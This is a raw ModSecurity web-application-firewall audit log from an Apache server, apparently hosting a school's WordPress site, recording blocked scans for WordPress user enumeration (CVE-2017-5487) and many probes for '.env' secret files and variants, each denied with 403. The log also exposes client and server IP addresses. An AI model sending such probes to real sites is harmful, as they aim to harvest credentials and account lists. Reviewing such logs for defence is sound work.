(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5957622f-Z-- --4c8e9c6d-A-- [15/Jun/2025:02:52:59 +0700] aE3TG2mwZ6YUkjOdtI4NDwAAAAc 103.236.140.4 54724 103.236.140.4 8181 --4c8e9c6d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.108.17.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.108.17.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c8e9c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c8e9c6d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749930779246737 3451 (- - -) Stopwatch2: 1749930779246737 3451; combined=1508, p1=523, p2=953, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c8e9c6d-Z-- --dd9cff25-A-- [15/Jun/2025:02:53:54 +0700] aE3TUmmwZ6YUkjOdtI4NEQAAABE 103.236.140.4 54728 103.236.140.4 8181 --dd9cff25-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 196.41.45.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.41.45.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dd9cff25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd9cff25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749930834144214 2854 (- - -) Stopwatch2: 1749930834144214 2854; combined=1309, p1=430, p2=848, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd9cff25-Z-- --fafcbc34-A-- [15/Jun/2025:03:35:04 +0700] aE3c-GmwZ6YUkjOdtI4NKQAAAAY 103.236.140.4 54850 103.236.140.4 8181 --fafcbc34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept-Charset: utf-8 --fafcbc34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fafcbc34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749933304201328 3802 (- - -) Stopwatch2: 1749933304201328 3802; combined=502, p1=388, p2=0, p3=0, p4=0, p5=114, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fafcbc34-Z-- --e93d8e19-A-- [15/Jun/2025:03:35:13 +0700] aE3dAWmwZ6YUkjOdtI4NKgAAAAg 103.236.140.4 54852 103.236.140.4 8181 --e93d8e19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Accept-Charset: utf-8 --e93d8e19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e93d8e19-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749933313411408 965 (- - -) Stopwatch2: 1749933313411408 965; combined=372, p1=327, p2=0, p3=0, p4=0, p5=45, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e93d8e19-Z-- --528da03f-A-- [15/Jun/2025:03:53:57 +0700] aE3hZT2YoubFl106kA3SWgAAAIs 103.236.140.4 54962 103.236.140.4 8181 --528da03f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.199.48.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.199.48.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --528da03f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --528da03f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749934437980071 3475 (- - -) Stopwatch2: 1749934437980071 3475; combined=1373, p1=479, p2=864, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --528da03f-Z-- --b1242a79-A-- [15/Jun/2025:05:47:20 +0700] aE37-D2YoubFl106kA3SpAAAAJc 103.236.140.4 55340 103.236.140.4 8181 --b1242a79-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.18.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.18.211 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b1242a79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1242a79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941240705767 924 (- - -) Stopwatch2: 1749941240705767 924; combined=405, p1=364, p2=0, p3=0, p4=0, p5=41, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1242a79-Z-- --91f49f28-A-- [15/Jun/2025:05:59:33 +0700] aE3-1br7GPil_2h-MzYG5wAAAM0 103.236.140.4 55376 103.236.140.4 8181 --91f49f28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36 --91f49f28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91f49f28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941973776104 958 (- - -) Stopwatch2: 1749941973776104 958; combined=380, p1=339, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91f49f28-Z-- --c1c9d700-A-- [15/Jun/2025:05:59:34 +0700] aE3-1rr7GPil_2h-MzYG6AAAAM4 103.236.140.4 55378 103.236.140.4 8181 --c1c9d700-B-- GET /.env.crt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1 --c1c9d700-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1c9d700-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941974222973 803 (- - -) Stopwatch2: 1749941974222973 803; combined=360, p1=323, p2=0, p3=0, p4=0, p5=37, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1c9d700-Z-- --11906567-A-- [15/Jun/2025:05:59:35 +0700] aE3-1z2YoubFl106kA3SrQAAAI4 103.236.140.4 55382 103.236.140.4 8181 --11906567-B-- GET /.env.pem HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SPH-M580BST Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 --11906567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11906567-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975112375 764 (- - -) Stopwatch2: 1749941975112375 764; combined=356, p1=323, p2=0, p3=0, p4=0, p5=33, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11906567-Z-- --bc73a94e-A-- [15/Jun/2025:05:59:35 +0700] aE3-1z2YoubFl106kA3SrgAAAJA 103.236.140.4 55384 103.236.140.4 8181 --bc73a94e-B-- GET /.envfile HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; BRAVIA 2015 Build/LMY48E.S223) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36 OPR/28.0.1754.0 OMI/4.4.22.20.E102586-1.136 --bc73a94e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc73a94e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975554323 713 (- - -) Stopwatch2: 1749941975554323 713; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc73a94e-Z-- --bb0b1113-A-- [15/Jun/2025:05:59:35 +0700] aE3-1_GguMGNwgSGIMwhsQAAAA4 103.236.140.4 55386 103.236.140.4 8181 --bb0b1113-B-- GET /Tmp/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) --bb0b1113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb0b1113-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941975997401 902 (- - -) Stopwatch2: 1749941975997401 902; combined=297, p1=263, p2=0, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb0b1113-Z-- --ea98e271-A-- [15/Jun/2025:05:59:36 +0700] aE3-2D2YoubFl106kA3SrwAAAI8 103.236.140.4 55388 103.236.140.4 8181 --ea98e271-B-- GET /.env.yml HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G930F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36 --ea98e271-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea98e271-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941976444465 694 (- - -) Stopwatch2: 1749941976444465 694; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea98e271-Z-- --8af28213-A-- [15/Jun/2025:05:59:36 +0700] aE3-2IZIfYpKBvn-jB7HDgAAAEU 103.236.140.4 55390 103.236.140.4 8181 --8af28213-B-- GET /.env.k8s HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 --8af28213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af28213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941976888383 878 (- - -) Stopwatch2: 1749941976888383 878; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af28213-Z-- --1191c974-A-- [15/Jun/2025:05:59:37 +0700] aE3-2br7GPil_2h-MzYG6gAAAM8 103.236.140.4 55392 103.236.140.4 8181 --1191c974-B-- GET /.env.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_3 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/WK10171 Safari/8536.25 --1191c974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1191c974-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941977331873 697 (- - -) Stopwatch2: 1749941977331873 697; combined=297, p1=264, p2=0, p3=0, p4=0, p5=32, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1191c974-Z-- --de214f52-A-- [15/Jun/2025:05:59:37 +0700] aE3-2fGguMGNwgSGIMwhsgAAAA8 103.236.140.4 55394 103.236.140.4 8181 --de214f52-B-- GET /.env-csr HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 --de214f52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de214f52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941977774797 810 (- - -) Stopwatch2: 1749941977774797 810; combined=288, p1=256, p2=0, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de214f52-Z-- --6634de00-A-- [15/Jun/2025:05:59:38 +0700] aE3-2vGguMGNwgSGIMwhswAAABE 103.236.140.4 55396 103.236.140.4 8181 --6634de00-B-- GET /.env.swo HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4 --6634de00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6634de00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941978240377 804 (- - -) Stopwatch2: 1749941978240377 804; combined=281, p1=250, p2=0, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6634de00-Z-- --8af28213-A-- [15/Jun/2025:05:59:38 +0700] aE3-2vGguMGNwgSGIMwhtAAAABI 103.236.140.4 55398 103.236.140.4 8181 --8af28213-B-- GET /.env.swn HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) --8af28213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af28213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941978685813 810 (- - -) Stopwatch2: 1749941978685813 810; combined=285, p1=253, p2=0, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af28213-Z-- --b84cdf64-A-- [15/Jun/2025:05:59:39 +0700] aE3-2z2YoubFl106kA3SsAAAAJE 103.236.140.4 55400 103.236.140.4 8181 --b84cdf64-B-- GET /.env-rce HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux 2.4.18-18.7.x i686; U) Opera 6.03 [en] --b84cdf64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84cdf64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749941979130545 756 (- - -) Stopwatch2: 1749941979130545 756; combined=302, p1=264, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84cdf64-Z-- --a76d8440-A-- [15/Jun/2025:05:59:39 +0700] aE3-24ZIfYpKBvn-jB7HDwAAAEc 103.236.140.4 55402 103.236.140.4 8181 --a76d8440-B-- GET /.env.sql HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Opera/9.80 (Windows NT 6.1; WOW64; MRA 6.4 (build 8614)) Presto/2.12.388 Version/12.16 --a76d8440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76d8440-H-- Message: Access denied with code 403 (phase 1). 
